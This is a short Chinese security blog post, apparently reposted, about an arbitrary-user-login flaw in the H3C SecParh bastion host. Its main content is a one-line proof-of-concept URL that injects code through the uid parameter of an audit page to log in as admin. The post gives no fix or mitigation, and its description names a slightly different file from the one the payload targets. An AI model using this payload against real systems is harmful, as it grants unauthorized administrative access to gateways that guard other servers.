H3C SecParh堡垒机任意用户登录

admin • 2021-12-31 09:15 • 安全

漏洞描述：

H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞

与齐治堡垒机出现的漏洞相似

POC：

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

本图文内容来源于网友网络收集整理提供，作为学习参考使用，版权属于原作者。

THE END

web安全原力计划安全

二维码

是的，我写的开源项目被曝出了高危漏洞。。

kali软件更新与更新失败问题解决

下一篇>>